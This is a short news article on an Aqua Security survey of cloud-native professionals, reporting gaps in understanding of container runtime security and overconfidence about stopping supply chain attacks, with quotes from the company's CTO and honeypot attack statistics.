The default security capabilities of containers are being overestimated by those working with them. In a survey conducted by Aqua Security, only three percent of respondents recognized that a container by itself is not a security boundary.

“The results of the survey showcase a staggering knowledge gap that leads to an underinvestment in a critical part of full lifecycle, end-to-end security for cloud native applications,” said Amir Jerbi, cofounder and CTO at Aqua. “When practitioners fail to implement a holistic approach with protecting their workloads at runtime, they are opening up their environments to attackers, since even the most complete ‘shift left’ vulnerability and malware detection cannot prevent zero-day attacks and administrator errors.” 

In addition, only 24% of respondents stated that they had plans to set up the building blocks that are needed for proper runtime security. 

The survey also revealed a knowledge gap around workload protection. Seventy-three percent of respondents thought they could stop supply chain attacks that make it past static analysis tools, but according to Aqua Security there was a misconception over the role of runtime security in that. 

“There is a concerning overconfidence in the perceived ability to prevent supply chain attacks. The reality is that runtime security is essential because sophisticated supply chain attacks evade static analysis. We see unnamed attackers use legitimate vanilla images to download malicious elements at runtime, Kinsing malware that only downloads in runtime, and attackers like Team TNT who hide their malicious communications attacking our honeypots on daily basis,” said Jerbi. 

The number of attacks overall has increased, signalling the need for greater security. In a six-month period Aqua Security observed over 17,000 honeypots that were attacked, which was an increase of 26% from the previous six months. 

Aqua Security surveyed over 150 cloud native security professionals across a number of sectors for the report.